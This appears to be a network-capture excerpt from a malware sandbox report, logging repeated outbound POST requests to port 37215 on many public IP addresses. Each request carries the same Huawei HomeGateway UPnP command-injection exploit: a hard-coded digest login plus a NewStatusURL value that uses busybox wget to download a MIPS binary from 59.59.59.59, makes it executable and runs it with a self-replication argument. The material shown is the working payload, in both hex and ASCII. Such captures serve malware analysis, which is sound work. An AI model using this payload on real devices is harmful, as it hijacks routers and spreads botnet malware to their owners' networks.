                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1399192.168.2.1552380157.163.167.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.842309952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1400192.168.2.1550422197.100.52.12237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.842340946 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1401192.168.2.1549750147.152.188.22737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.842416048 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1402192.168.2.153501441.23.31.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843189001 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1403192.168.2.1535828157.134.132.15537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843214989 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1404192.168.2.1536866197.143.105.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843241930 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1405192.168.2.1542486197.135.92.17937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843261957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1406192.168.2.1548132197.141.52.24037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843313932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1407192.168.2.1551588157.195.50.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843519926 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1408192.168.2.154668041.229.222.12537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843538046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 